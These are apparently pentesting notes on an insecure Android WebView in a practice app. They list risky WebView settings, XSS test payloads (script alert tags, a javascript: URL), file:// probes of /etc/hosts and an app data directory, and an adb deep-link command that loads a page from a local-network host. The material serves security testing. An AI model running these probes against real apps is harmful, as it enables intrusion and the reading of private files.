Insecure WebView

Threats

• JavaScript enabled: setJavaScriptEnabled(true)
• File access: file:///
• JavaScript Interface: addJavascriptInterface()
• No URL validation
• Debugging enabled in production

XSS Test

javascript:alert("XSS Detected!")

<script>alert('XSS')</script>
<script>alert(1)</script>

File access test

file:///etc/hosts
file:///data/data/com.package.name/

Exploit via Deep Link

adb shell am start -W -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=http://192.168.1.14:9090/test.html"